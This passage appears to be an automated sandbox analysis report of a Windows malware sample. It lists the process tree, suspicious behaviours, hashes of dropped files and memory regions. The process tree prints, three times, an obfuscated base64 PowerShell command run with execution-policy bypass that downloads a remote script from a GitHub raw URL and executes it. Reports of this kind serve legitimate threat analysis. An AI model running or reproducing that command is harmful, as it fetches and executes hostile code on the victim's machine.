C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES470B.tmpFilesize
1KB
MD52fed60c3e2a98d72607dfafbc6f6f7ba
SHA153fa5796bc6b0e3e4e2f29a40467359be0ec2474
SHA256ba2f39b5d9490d462a0b84ce0e3e63f599d8e1d6ee64b994a4aba993bcbc1679
SHA512365c5876f7337ef7f5f3028ba3cdc3ddc8a8c7780c64297d756c284056c3dfdd358906cc3889a06bcda74317a4746771c0a3eecac8eddf36a3951db302df8573
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja0cfd21.3an.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD53447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1Filesize
2.5MB
MD51c42eeda1f1bcf1b607aae8a13af258a
SHA13ceae3bbf209e777069cad37f0073c00564b7060
SHA256300199ee623af4efb07d6904e943bb1807f9e58efb6cae448630aa3c16e4fb75
SHA5125579df57fcbb7a4958cb2630e9d4fe7cbbd10821182227e1a64c522c98e254135720f26eda05c2e9c5959b40fed480e90aa10ba47be602d8c843ac965d8a0853
-
C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.dllFilesize
3KB
MD50b23b0d02417d619b0f6af4e4d06d1f2
SHA1af4d419bc191eb3356b18a88a77e8dd0e5258039
SHA256b2114df04d37c0e4c5a7df78d4c47cdf4474e1c8c37783167b1b81b6681b85cd
SHA51203bf8c4f8b5e5624ba44535cf627c97cbef0975ab02aaedcdc019afd40039f9548ab94382b61072cb568b0c349552d731ce07e52c9102dab630331a6114ea2b4
-
C:\Windows\Branding\mediasrv.pngFilesize
60KB
MD55e1182125ef143f791788d0dc4bf3e9b
SHA1dfb1e962e91de4a90ebe27d454801ac182e15106
SHA256a3355f5763c1189c54710459c0bb09182491544dc087f301827669947b951b10
SHA512e4db09adcc2c7ce86a8a6cea4fc1522ef6d17466e468137bac6e86849b10839bf0a5a77469fa135f41a1885471433d33d18113c0c23daa604f2e84330e9ad3ea
-
C:\Windows\Branding\mediasvc.pngFilesize
743KB
MD56d38a0137dd439eb26f8f19d2bb50b83
SHA1392ae467b6e5c796669a746d67924529241e51cf
SHA25660fc94385520b4353ddc0d9fda9698f4f61ff74abaf794525b9828f8bc24ed0a
SHA51231141bb3943202b0081078312b3551e0b931520e8dd3661fa75075d016c7d6ad9c9f6e259c555ca4b52e8e7a7344bffbdf65ba0e4f897ecbcf625c3bb09b40b7
-
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmpFilesize
24KB
MD5d0e162c0bd0629323ebb1ed88df890d6
SHA1cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA2563e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMPFilesize
652B
MD56467486360d173ddd72f4550ccb764ca
SHA1fc61c70e5195b02aebbe7e8ec5ff7b966e9630bc
SHA256f7a0a2230daa4325397445fbcdb9e3fd11b23e25f5fb54824c0a7150e3081f3a
SHA512bbbf91749aa2c793fa07a1204b8494b045dd32bb8921ecacfaa96b43e36d19ba960184dab10cd0f0b29542567bf860f49ac80ea8b45e601640a4812dc3c8d484
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.0.csFilesize
424B
MD54864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdlineFilesize
369B
MD5871027a71f42549e96ad7b4001b974ea
SHA10547df0d290e4203f7bedfb42a51360725fe483f
SHA25687da13785264c45af7b1c0077c12b1f213973f972b862e54236c7b6eadf99649
SHA51281e3588e3fc7986e11a77119f76ed8f93a7b1c0a133430d500bd814de0edff194078266f8c01b313262433d0f54e18994d35153548a99da43a9e2e27cc03943a
-
memory/2068-63-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2068-53-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2136-104-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2136-145-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2136-142-0x000002185D580000-0x000002185D590000-memory.dmpFilesize
64KB
-
memory/2636-2-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmpFilesize
64KB
-
memory/2636-0-0x000001FE9A560000-0x000001FE9A810000-memory.dmpFilesize
2.7MB
-
memory/2636-98-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmpFilesize
64KB
-
memory/2636-3-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmpFilesize
64KB
-
memory/2636-4-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmpFilesize
64KB
-
memory/2636-93-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmpFilesize
64KB
-
memory/2636-1-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2636-154-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/2636-64-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/4500-75-0x00000204214C0000-0x00000204214D0000-memory.dmpFilesize
64KB
-
memory/4500-76-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/4500-74-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5144-109-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5144-146-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-77-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmpFilesize
100KB
-
memory/5144-7-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5144-23-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-152-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmpFilesize
100KB
-
memory/5144-151-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5144-39-0x0000018A625D0000-0x0000018A627DA000-memory.dmpFilesize
2.0MB
-
memory/5144-38-0x0000018A62240000-0x0000018A623B6000-memory.dmpFilesize
1.5MB
-
memory/5144-37-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-8-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-110-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-34-0x0000018A49960000-0x0000018A49968000-memory.dmpFilesize
32KB
-
memory/5144-141-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-15-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5144-14-0x0000018A61BC0000-0x0000018A61BE2000-memory.dmpFilesize
136KB
-
memory/5144-148-0x0000018A49970000-0x0000018A49980000-memory.dmpFilesize
64KB
-
memory/5184-52-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5184-49-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmpFilesize
10.8MB
-
memory/5184-50-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmpFilesize
64KB
-
memory/5184-51-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmpFilesize
64KB